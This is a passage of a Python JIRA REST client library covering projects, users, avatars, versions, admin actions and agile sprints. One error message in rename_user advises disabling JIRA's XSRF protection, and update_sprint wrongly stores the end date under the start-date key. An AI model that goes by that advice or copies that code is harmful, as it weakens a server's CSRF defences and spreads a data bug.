def issue_link(self, id):
"""
Get an issue link Resource from the server.
:param id: ID of the issue link to get
"""
return self._find_for_resource(IssueLink, id)
# Issue link types
def issue_link_types(self):
"""Get a list of issue link type Resources from the server."""
r_json = self._get_json('issueLinkType')
link_types = [IssueLinkType(self._options, self._session, raw_link_json) for raw_link_json in
r_json['issueLinkTypes']]
return link_types
def issue_link_type(self, id):
"""
Get an issue link type Resource from the server.
:param id: ID of the issue link type to get
"""
return self._find_for_resource(IssueLinkType, id)
# Issue types
def issue_types(self):
"""Get a list of issue type Resources from the server."""
r_json = self._get_json('issuetype')
issue_types = [IssueType(
self._options, self._session, raw_type_json) for raw_type_json in r_json]
return issue_types
def issue_type(self, id):
"""
Get an issue type Resource from the server.
:param id: ID of the issue type to get
"""
return self._find_for_resource(IssueType, id)
# User permissions
# non-resource
def my_permissions(self, projectKey=None, projectId=None, issueKey=None, issueId=None):
"""
Get a dict of all available permissions on the server.
:param projectKey: limit returned permissions to the specified project
:param projectId: limit returned permissions to the specified project
:param issueKey: limit returned permissions to the specified issue
:param issueId: limit returned permissions to the specified issue
"""
params = {}
if projectKey is not None:
params['projectKey'] = projectKey
if projectId is not None:
params['projectId'] = projectId
if issueKey is not None:
params['issueKey'] = issueKey
if issueId is not None:
params['issueId'] = issueId
return self._get_json('mypermissions', params=params)
# Priorities
def priorities(self):
"""Get a list of priority Resources from the server."""
r_json = self._get_json('priority')
priorities = [Priority(
self._options, self._session, raw_priority_json) for raw_priority_json in r_json]
return priorities
def priority(self, id):
"""
Get a priority Resource from the server.
:param id: ID of the priority to get
"""
return self._find_for_resource(Priority, id)
# Projects
def projects(self):
"""Get a list of project Resources from the server visible to the current authenticated user."""
r_json = self._get_json('project')
projects = [Project(
self._options, self._session, raw_project_json) for raw_project_json in r_json]
return projects
def project(self, id):
"""
Get a project Resource from the server.
:param id: ID or key of the project to get
"""
return self._find_for_resource(Project, id)
# non-resource
@translate_resource_args
def project_avatars(self, project):
"""
Get a dict of all avatars for a project visible to the current authenticated user.
:param project: ID or key of the project to get avatars for
"""
return self._get_json('project/' + project + '/avatars')
@translate_resource_args
def create_temp_project_avatar(self, project, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a project avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on libmagic and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_project_avatar` to finish the avatar creation process. If\
you want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the 'auto_confirm'\
argument with a truthy value and :py:meth:`confirm_project_avatar` will be called for you before this method\
returns.
:param project: ID or key of the project to create the avatar in
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object holding the avatar
:param contentType: explicit specification for the avatar image's content-type
:param boolean auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_project_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('project/' + project + '/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_project_avatar(project, cropping_properties)
else:
return cropping_properties
@translate_resource_args
def confirm_project_avatar(self, project, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_project_avatar`, use this method to confirm the avatar
for use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_project_avatar` should be used for this
argument.
:param project: ID or key of the project to confirm the avatar in
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_project_avatar`
"""
data = cropping_properties
url = self._get_url('project/' + project + '/avatar')
r = self._session.post(
url, data=json.dumps(data))
return json_loads(r)
@translate_resource_args
def set_project_avatar(self, project, avatar):
"""
Set a project's avatar.
:param project: ID or key of the project to set the avatar on
:param avatar: ID of the avatar to set
"""
self._set_avatar(
None, self._get_url('project/' + project + '/avatar'), avatar)
@translate_resource_args
def delete_project_avatar(self, project, avatar):
"""
Delete a project's avatar.
:param project: ID or key of the project to delete the avatar from
:param avatar: ID of the avater to delete
"""
url = self._get_url('project/' + project + '/avatar/' + avatar)
r = self._session.delete(url)
@translate_resource_args
def project_components(self, project):
"""
Get a list of component Resources present on a project.
:param project: ID or key of the project to get components from
"""
r_json = self._get_json('project/' + project + '/components')
components = [Component(
self._options, self._session, raw_comp_json) for raw_comp_json in r_json]
return components
@translate_resource_args
def project_versions(self, project):
"""
Get a list of version Resources present on a project.
:param project: ID or key of the project to get versions from
"""
r_json = self._get_json('project/' + project + '/versions')
versions = [
Version(self._options, self._session, raw_ver_json) for raw_ver_json in r_json]
return versions
# non-resource
@translate_resource_args
def project_roles(self, project):
"""
Get a dict of role names to resource locations for a project.
:param project: ID or key of the project to get roles from
"""
return self._get_json('project/' + project + '/role')
@translate_resource_args
def project_role(self, project, id):
"""
Get a role Resource.
:param project: ID or key of the project to get the role from
:param id: ID of the role to get
"""
return self._find_for_resource(Role, (project, id))
# Resolutions
def resolutions(self):
"""Get a list of resolution Resources from the server."""
r_json = self._get_json('resolution')
resolutions = [Resolution(
self._options, self._session, raw_res_json) for raw_res_json in r_json]
return resolutions
def resolution(self, id):
"""
Get a resolution Resource from the server.
:param id: ID of the resolution to get
"""
return self._find_for_resource(Resolution, id)
# Search
def search_issues(self, jql_str, startAt=0, maxResults=50, validate_query=True, fields=None, expand=None,
json_result=None):
"""
Get a ResultList of issue Resources matching a JQL search string.
:param jql_str: the JQL search string to use
:param startAt: index of the first issue to return
:param maxResults: maximum number of issues to return. Total number of results
is available in the ``total`` attribute of the returned ResultList.
If maxResults evaluates as False, it will try to get all issues in batches of 50.
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# TODO what to do about the expand, which isn't related to the issues?
infinite = False
maxi = 50
idx = 0
if fields is None:
fields = []
# If None is passed as parameter, this fetch all issues from the query
if not maxResults:
maxResults = maxi
infinite = True
search_params = {
"jql": jql_str,
"startAt": startAt,
"maxResults": maxResults,
"validateQuery": validate_query,
"fields": fields,
"expand": expand
}
if json_result:
return self._get_json('search', params=search_params)
resource = self._get_json('search', params=search_params)
issues = [Issue(self._options, self._session, raw_issue_json)
for raw_issue_json in resource['issues']]
cnt = len(issues)
total = resource['total']
if infinite:
while cnt == maxi:
idx += maxi
search_params["startAt"] = idx
resource = self._get_json('search', params=search_params)
issue_batch = [Issue(self._options, self._session, raw_issue_json) for raw_issue_json in
resource['issues']]
issues.extend(issue_batch)
cnt = len(issue_batch)
return ResultList(issues, total)
# Security levels
def security_level(self, id):
"""
Get a security level Resource.
:param id: ID of the security level to get
"""
return self._find_for_resource(SecurityLevel, id)
# Server info
# non-resource
def server_info(self):
"""Get a dict of server information for this JIRA instance."""
return self._get_json('serverInfo')
# Status
def statuses(self):
"""Get a list of status Resources from the server."""
r_json = self._get_json('status')
statuses = [Status(self._options, self._session, raw_stat_json)
for raw_stat_json in r_json]
return statuses
def status(self, id):
"""
Get a status Resource from the server.
:param id: ID of the status resource to get
"""
return self._find_for_resource(Status, id)
# Users
def user(self, id, expand=None):
"""
Get a user Resource from the server.
:param id: ID of the user to get
:param expand: extra information to fetch inside each resource
"""
user = User(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
user.find(id, params=params)
return user
def search_assignable_users_for_projects(self, username, projectKeys, startAt=0, maxResults=50):
"""
Get a list of user Resources that match the search string and can be assigned issues for projects.
:param username: a string to match usernames against
:param projectKeys: comma-separated list of project keys to check for issue assignment permissions
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'projectKeys': projectKeys,
'startAt': startAt,
'maxResults': maxResults
}
r_json = self._get_json(
'user/assignable/multiProjectSearch', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_assignable_users_for_issues(self, username, project=None, issueKey=None, expand=None, startAt=0,
maxResults=50):
"""
Get a list of user Resources that match the search string for assigning or creating issues.
This method is intended to find users that are eligible to create issues in a project or be assigned
to an existing issue. When searching for eligible creators, specify a project. When searching for eligible
assignees, specify an issue key.
:param username: a string to match usernames against
:param project: filter returned users by permission in this project (expected if a result will be used to \
create an issue)
:param issueKey: filter returned users by this issue (expected if a result will be used to edit this issue)
:param expand: extra information to fetch inside each resource
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'startAt': startAt,
'maxResults': maxResults,
}
if project is not None:
params['project'] = project
if issueKey is not None:
params['issueKey'] = issueKey
if expand is not None:
params['expand'] = expand
r_json = self._get_json('user/assignable/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# non-resource
def user_avatars(self, username):
"""
Get a dict of avatars for the specified user.
:param username: the username to get avatars for
"""
return self._get_json('user/avatars', params={'username': username})
def create_temp_user_avatar(self, user, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a user avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on ``libmagic`` and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_user_avatar` to finish the avatar creation process. If you
want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the ``auto_confirm``
argument with a truthy value and :py:meth:`confirm_user_avatar` will be called for you before this method
returns.
:param user: user to register the avatar for
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object containing the avatar
:param contentType: explicit specification for the avatar image's content-type
:param auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_user_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'username': user,
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('user/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_user_avatar(user, cropping_properties)
else:
return cropping_properties
def confirm_user_avatar(self, user, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_user_avatar`, use this method to confirm the avatar for
use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_user_avatar` should be used for this
argument.
:param user: the user to confirm the avatar for
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_user_avatar`
"""
data = cropping_properties
url = self._get_url('user/avatar')
r = self._session.post(url, params={'username': user},
data=json.dumps(data))
return json_loads(r)
def set_user_avatar(self, username, avatar):
"""
Set a user's avatar.
:param username: the user to set the avatar for
:param avatar: ID of the avatar to set
"""
self._set_avatar(
{'username': username}, self._get_url('user/avatar'), avatar)
def delete_user_avatar(self, username, avatar):
"""
Delete a user's avatar.
:param username: the user to delete the avatar from
:param avatar: ID of the avatar to remove
"""
params = {'username': username}
url = self._get_url('user/avatar/' + avatar)
r = self._session.delete(url, params=params)
def search_users(self, user, startAt=0, maxResults=50, includeActive=True, includeInactive=False):
"""
Get a list of user Resources that match the specified search string.
:param user: a string to match usernames, name or email against
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
'includeActive': includeActive,
'includeInactive': includeInactive
}
r_json = self._get_json('user/search', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_allowed_users_for_issue(self, user, issueKey=None, projectKey=None, startAt=0, maxResults=50):
"""
Get a list of user Resources that match a username string and have browse permission for the issue or
project.
:param user: a string to match usernames against
:param issueKey: find users with browse permission for this issue
:param projectKey: find users with browse permission for this project
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
}
if issueKey is not None:
params['issueKey'] = issueKey
if projectKey is not None:
params['projectKey'] = projectKey
r_json = self._get_json('user/viewissue/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# Versions
@translate_resource_args
def create_version(self, name, project, description=None, releaseDate=None, startDate=None, archived=False,
released=False):
"""
Create a version in a project and return a Resource for it.
:param name: name of the version to create
:param project: key of the project to create the version in
:param description: a description of the version
:param releaseDate: the release date assigned to the version
:param startDate: The start date for the version
"""
data = {
'name': name,
'project': project,
'archived': archived,
'released': released
}
if description is not None:
data['description'] = description
if releaseDate is not None:
data['releaseDate'] = releaseDate
if startDate is not None:
data['startDate'] = startDate
url = self._get_url('version')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
def move_version(self, id, after=None, position=None):
"""
Move a version within a project's ordered version list and return a new version Resource for it. One,
but not both, of ``after`` and ``position`` must be specified.
:param id: ID of the version to move
:param after: the self attribute of a version to place the specified version after (that is, higher in the list)
:param position: the absolute position to move this version to: must be one of ``First``, ``Last``,\
``Earlier``, or ``Later``
"""
data = {}
if after is not None:
data['after'] = after
elif position is not None:
data['position'] = position
url = self._get_url('version/' + id + '/move')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
def version(self, id, expand=None):
"""
Get a version Resource.
:param id: ID of the version to get
:param expand: extra information to fetch inside each resource
"""
version = Version(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
version.find(id, params=params)
return version
def version_count_related_issues(self, id):
"""
Get a dict of the counts of issues fixed and affected by a version.
:param id: the version to count issues for
"""
r_json = self._get_json('version/' + id + '/relatedIssueCounts')
del r_json['self'] # this isn't really an addressable resource
return r_json
def version_count_unresolved_issues(self, id):
"""
Get the number of unresolved issues for a version.
:param id: ID of the version to count issues for
"""
return self._get_json('version/' + id + '/unresolvedIssueCount')['issuesUnresolvedCount']
# Session authentication
def session(self):
"""Get a dict of the current authenticated user's session information."""
url = '{server}/rest/auth/1/session'.format(**self._options)
if type(self._session.auth) is tuple:
authentication_data = {
'username': self._session.auth[0], 'password': self._session.auth[1]}
r = self._session.post(url, data=json.dumps(authentication_data))
else:
r = self._session.get(url)
user = User(self._options, self._session, json_loads(r))
return user
def kill_session(self):
"""Destroy the session of the current authenticated user."""
url = self._options['server'] + '/rest/auth/latest/session'
r = self._session.delete(url)
# Websudo
def kill_websudo(self):
"""Destroy the user's current WebSudo session."""
url = self._options['server'] + '/rest/auth/1/websudo'
r = self._session.delete(url)
# Utilities
def _create_http_basic_session(self, username, password):
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = (username, password)
self._session.cert = self._options['client_cert']
def _create_oauth_session(self, oauth):
verify = self._options['verify']
from requests_oauthlib import OAuth1
from oauthlib.oauth1 import SIGNATURE_RSA
oauth = OAuth1(
oauth['consumer_key'],
rsa_key=oauth['key_cert'],
signature_method=SIGNATURE_RSA,
resource_owner_key=oauth['access_token'],
resource_owner_secret=oauth['access_token_secret']
)
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = oauth
def _set_avatar(self, params, url, avatar):
data = {
'id': avatar
}
r = self._session.put(url, params=params, data=json.dumps(data))
def _get_url(self, path, base=JIRA_BASE_URL):
options = self._options
options.update({'path': path})
return base.format(**options)
def _get_json(self, path, params=None, base=JIRA_BASE_URL):
url = self._get_url(path, base)
r = self._session.get(url, params=params)
try:
r_json = json_loads(r)
except ValueError as e:
logging.error("%s\n%s" % (e, r.text))
raise e
return r_json
def _find_for_resource(self, resource_cls, ids, expand=None):
resource = resource_cls(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
resource.find(id=ids, params=params)
return resource
def _try_magic(self):
try:
import magic
import weakref
except ImportError:
self._magic = None
else:
try:
_magic = magic.Magic(flags=magic.MAGIC_MIME_TYPE)
cleanup = lambda _: _magic.close()
self._magic_weakref = weakref.ref(self, cleanup)
self._magic = _magic
except TypeError:
self._magic = None
except AttributeError:
self._magic = None
def _get_mime_type(self, buff):
if self._magic is not None:
return self._magic.id_buffer(buff)
else:
try:
return mimetypes.guess_type("f." + imghdr.what(0, buff))[0]
except (IOError, TypeError):
logging.warning("Couldn't detect content type of avatar image"
". Specify the 'contentType' parameter explicitly.")
return None
def email_user(self, user, body, title="JIRA Notification"):
"""
TBD:
"""
url = self._options['server'] + \
'/secure/admin/groovy/CannedScriptRunner.jspa'
payload = {
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'cannedScriptArgs_FIELD_CONDITION': '',
'cannedScriptArgs_FIELD_EMAIL_TEMPLATE': body,
'cannedScriptArgs_FIELD_EMAIL_SUBJECT_TEMPLATE': title,
'cannedScriptArgs_FIELD_EMAIL_FORMAT': 'TEXT',
'cannedScriptArgs_FIELD_TO_ADDRESSES': self.user(user).emailAddress,
'cannedScriptArgs_FIELD_TO_USER_FIELDS': '',
'cannedScriptArgs_FIELD_INCLUDE_ATTACHMENTS': 'FIELD_INCLUDE_ATTACHMENTS_NONE',
'cannedScriptArgs_FIELD_FROM': '',
'cannedScriptArgs_FIELD_PREVIEW_ISSUE': '',
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'id': '',
'Preview': 'Preview',
}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
open("/tmp/jira_email_user_%s.html" % user, "w").write(r.text)
def rename_user(self, old_user, new_user):
"""
Rename a JIRA user. Current implementation relies on third party plugin but in the future it may use embedded JIRA functionality.
:param old_user: string with username login
:param new_user: string with username login
"""
if self._version >= (6, 0, 0):
url = self._options['server'] + '/rest/api/2/user'
payload = {
"name": new_user,
}
params = {
'username': old_user
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.put(url, params=params,
data=json.dumps(payload))
else:
# old implementation needed the ScripRunner plugin
merge = "true"
try:
self.user(new_user)
except:
merge = "false"
url = self._options[
'server'] + '/secure/admin/groovy/CannedScriptRunner.jspa#result'
payload = {
"cannedScript": "com.onresolve.jira.groovy.canned.admin.RenameUser",
"cannedScriptArgs_FIELD_FROM_USER_ID": old_user,
"cannedScriptArgs_FIELD_TO_USER_ID": new_user,
"cannedScriptArgs_FIELD_MERGE": merge,
"id": "",
"RunCanned": "Run",
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 404:
logging.error(
"In order to be able to use rename_user() you need to install Script Runner plugin. See https://marketplace.atlassian.com/plugins/com.onresolve.jira.groovy.groovyrunner")
return False
if r.status_code != 200:
logging.error(r.status_code)
if re.compile("XSRF Security Token Missing").search(r.content):
logging.fatal(
"Reconfigure JIRA and disable XSRF in order to be able call this. See https://developer.atlassian.com/display/JIRADEV/Form+Token+Handling")
return False
open("/tmp/jira_rename_user_%s_to%s.html" %
(old_user, new_user), "w").write(r.content)
msg = r.status_code
m = re.search("<span class=\"errMsg\">(.*)<\/span>", r.content)
if m:
msg = m.group(1)
logging.error(msg)
return False
# <span class="errMsg">Target user ID must exist already for a merge</span>
p = re.compile("type=\"hidden\" name=\"cannedScriptArgs_Hidden_output\" value=\"(.*?)\"\/>",
re.MULTILINE | re.DOTALL)
m = p.search(r.content)
if m:
h = html_parser.HTMLParser()
msg = h.unescape(m.group(1))
logging.info(msg)
# let's check if the user still exists
try:
self.user(old_user)
except:
logging.error("User %s does not exists." % old_user)
return msg
logging.error(msg)
logging.error(
"User %s does still exists after rename, that's clearly a problem." % old_user)
return False
def delete_user(self, username):
url = self._options['server'] + \
'/rest/api/latest/user/?username=%s' % username
r = self._session.delete(url)
if 200 <= r.status_code <= 299:
return True
else:
logging.error(r.status_code)
return False
def reindex(self, force=False, background=True):
"""
Start jira re-indexing. Returns True if reindexing is in progress or not needed, or False.
If you call reindex() without any parameters it will perform a backfround reindex only if JIRA thinks it should do it.
:param force: reindex even if JIRA doesn'tt say this is needed, False by default.
:param background: reindex inde background, slower but does not impact the users, defaults to True.
"""
# /secure/admin/IndexAdmin.jspa
# /secure/admin/jira/IndexProgress.jspa?taskId=1
if background:
indexingStrategy = 'background'
else:
indexingStrategy = 'stoptheworld'
url = self._options['server'] + '/secure/admin/jira/IndexReIndex.jspa'
r = self._session.get(url, headers=self._options['headers'])
if r.status_code == 503:
# logging.warning("JIRA returned 503, this could mean that a full reindex is in progress.")
return 503
if not r.text.find("To perform the re-index now, please go to the") and force is False:
return True
if r.text.find('All issues are being re-indexed'):
logging.warning("JIRA re-indexing is already running.")
return True # still reindexing is considered still a success
if r.text.find('To perform the re-index now, please go to the') or force:
r = self._session.post(url, headers=self._options['headers'],
params={"indexingStrategy": indexingStrategy, "reindex": "Re-Index"})
if r.text.find('All issues are being re-indexed') != -1:
return True
else:
logging.error("Failed to reindex jira, probably a bug.")
return False
def backup(self, filename='backup.zip'):
"""
Will call jira export to backup as zipped xml. Returning with success does not mean that the backup process finished.
"""
url = self._options['server'] + '/secure/admin/XmlBackup.jspa'
payload = {'filename': filename}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 200:
return True
else:
logging.warning(
'Got %s response from calling backup.' % r.status_code)
return r.status_code
def current_user(self):
if not hasattr(self, '_serverInfo') or 'username' not in self._serverInfo:
url = self._get_url('serverInfo')
r = self._session.get(url, headers=self._options['headers'])
r_json = json_loads(r)
if 'x-ausername' in r.headers:
r_json['username'] = r.headers['x-ausername']
else:
r_json['username'] = None
self._serverInfo = r_json
# del r_json['self'] # this isn't really an addressable resource
return self._serverInfo['username']
def delete_project(self, pid):
"""
Project can be id, project key or project name. It will return False if it fails.
"""
found = False
try:
if not str(int(pid)) == pid:
found = True
except Exception as e:
r_json = self._get_json('project')
for e in r_json:
if e['key'] == pid or e['name'] == pid:
pid = e['id']
found = True
break
if not found:
logging.error("Unable to recognize project `%s`" % pid)
return False
url = self._options['server'] + '/secure/admin/DeleteProject.jspa'
payload = {'pid': pid, 'Delete': 'Delete', 'confirm': 'true'}
r = self._session.post(
url, headers=CaseInsensitiveDict({'content-type': 'application/x-www-form-urlencoded'}), data=payload)
if r.status_code == 200:
return self._check_for_html_error(r.text)
else:
logging.warning(
'Got %s response from calling delete_project.' % r.status_code)
return r.status_code
def create_project(self, key, name=None, assignee=None):
"""
Key is mandatory and has to match JIRA project key requirements, usually only 2-10 uppercase characters.
If name is not specified it will use the key value.
If assignee is not specified it will use current user.
The returned value should evaluate to False if it fails otherwise it will be the new project id.
"""
if assignee is None:
assignee = self.current_user()
if name is None:
name = key
if key.upper() != key or not key.isalpha() or len(key) < 2 or len(key) > 10:
logging.error(
'key parameter is not all uppercase alphanumeric of length between 2 and 10')
return False
url = self._options['server'] + \
'/rest/project-templates/1.0/templates'
r = self._session.get(url)
j = json_loads(r)
template_key = None
templates = []
for template in j['projectTemplates']:
templates.append(template['name'])
if template['name'] in ['JIRA Classic', 'JIRA Default Schemes']:
template_key = template['projectTemplateModuleCompleteKey']
break
if not template_key:
raise JIRAError(
"Unable to find a suitable project template to use. Found only: " + ', '.join(templates))
payload = {'name': name,
'key': key,
'keyEdited': 'false',
#'projectTemplate': 'com.atlassian.jira-core-project-templates:jira-issuetracking',
#'permissionScheme': '',
'projectTemplateWebItemKey': template_key,
'projectTemplateModuleKey': template_key,
'lead': assignee,
#'assigneeType': '2',
}
headers = CaseInsensitiveDict(
{'Content-Type': 'application/x-www-form-urlencoded'})
r = self._session.post(url, data=payload, headers=headers)
if r.status_code == 200:
r_json = json_loads(r)
return r_json
f = tempfile.NamedTemporaryFile(
suffix='.html', prefix='python-jira-error-create-project-', delete=False)
f.write(r.text)
if self.logging:
logging.error(
"Unexpected result while running create project. Server response saved in %s for further investigation [HTTP response=%s]." % (
f.name, r.status_code))
return False
def add_user(self, username, email, directoryId=1, password=None, fullname=None, sendEmail=False, active=True):
fullname = username
# TODO: default the directoryID to the first directory in jira instead
# of 1 which is the internal one.
url = self._options['server'] + '/rest/api/latest/user'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['displayName'] = fullname
x['emailAddress'] = email
x['name'] = username
if password:
x['password'] = password
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
def add_user_to_group(self, username, group):
'''
Adds a user to an existing group.
:param username: Username that will be added to specified group.
:param group: Group that the user will be added to.
:return: Boolean, True for success, false for failure.
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': group}
y = {'name': username}
payload = json.dumps(y)
self._session.post(url, params=x, data=payload)
return True
def remove_user_from_group(self, username, groupname):
'''
Removes a user from a group.
:param username: The user to remove from the group.
:param groupname: The group that the user will be removed from.
:return:
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': groupname,
'username': username}
self._session.delete(url, params=x)
return True
# Experimental
# Experimental support for iDalko Grid, expect API to change as it's using private APIs currently
# https://support.idalko.com/browse/IGRID-1017
def get_igrid(self, issueid, customfield, schemeid):
url = self._options['server'] + '/rest/idalko-igrid/1.0/datagrid/data'
if str(customfield).isdigit():
customfield = "customfield_%s" % customfield
params = {
#'_mode':'view',
'_issueId': issueid,
'_fieldId': customfield,
'_confSchemeId': schemeid,
#'validate':True,
#'_search':False,
#'rows':100,
#'page':1,
#'sidx':'DEFAULT',
#'sord':'asc',
}
r = self._session.get(
url, headers=self._options['headers'], params=params)
return json_loads(r)
# Jira Agile specific methods (GreenHopper)
"""
Define the functions that interact with GreenHopper.
"""
@translate_resource_args
def boards(self):
"""
Get a list of board GreenHopperResources.
"""
r_json = self._get_json(
'rapidviews/list', base=self.AGILE_BASE_URL)
boards = [Board(self._options, self._session, raw_boards_json)
for raw_boards_json in r_json['views']]
return boards
@translate_resource_args
def sprints(self, id, extended=False):
"""
Get a list of sprint GreenHopperResources.
:param id: the board to get sprints from
:param extended: fetch additional information like startDate, endDate, completeDate,
much slower because it requires an additional requests for each sprint
:rtype: dict
>>> { "id": 893,
>>> "name": "iteration.5",
>>> "state": "FUTURE",
>>> "linkedPagesCount": 0,
>>> "startDate": "None",
>>> "endDate": "None",
>>> "completeDate": "None",
>>> "remoteLinks": []
>>> }
"""
r_json = self._get_json('sprintquery/%s?includeHistoricSprints=true&includeFutureSprints=true' % id,
base=self.AGILE_BASE_URL)
if extended:
sprints = []
for raw_sprints_json in r_json['sprints']:
r_json = self._get_json(
'sprint/%s/edit/model' % raw_sprints_json['id'], base=self.AGILE_BASE_URL)
sprints.append(
Sprint(self._options, self._session, r_json['sprint']))
else:
sprints = [Sprint(self._options, self._session, raw_sprints_json)
for raw_sprints_json in r_json['sprints']]
return sprints
def sprints_by_name(self, id, extended=False):
sprints = {}
for s in self.sprints(id, extended=extended):
if s.name not in sprints:
sprints[s.name] = s.raw
else:
raise (Exception(
"Fatal error, duplicate Sprint Name (%s) found on board %s." % (s.name, id)))
return sprints
def update_sprint(self, id, name=None, startDate=None, endDate=None):
payload = {}
if name:
payload['name'] = name
if startDate:
payload['startDate'] = startDate
if endDate:
payload['startDate'] = endDate
# if state:
# payload['state']=state
url = self._get_url('sprint/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
return json_loads(r)
def completed_issues(self, board_id, sprint_id):
"""
Return the completed issues for ``board_id`` and ``sprint_id``.
:param board_id: the board retrieving issues from
:param sprint_id: the sprint retieving issues from
"""
# TODO need a better way to provide all the info from the sprintreport
# incompletedIssues went to backlog but not it not completed
# issueKeysAddedDuringSprint used to mark some with a * ?
# puntedIssues are for scope change?
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['completedIssues']]
return issues
def completedIssuesEstimateSum(self, board_id, sprint_id):
"""
Return the total completed points this sprint.
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['contents']['completedIssuesEstimateSum']['value']
def incompleted_issues(self, board_id, sprint_id):
"""
Return the completed issues for the sprint
"""
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['incompletedIssues']]
return issues
def sprint_info(self, board_id, sprint_id):
"""
Return the information about a sprint.
:param board_id: the board retrieving issues from
:param sprint_id: the sprint retieving issues from
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['sprint']
# TODO: remove this as we do have Board.delete()
def delete_board(self, id):
"""
Deletes an agile board.
:param id:
:return:
"""
payload = {}
url = self._get_url(
'rapidview/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.delete(
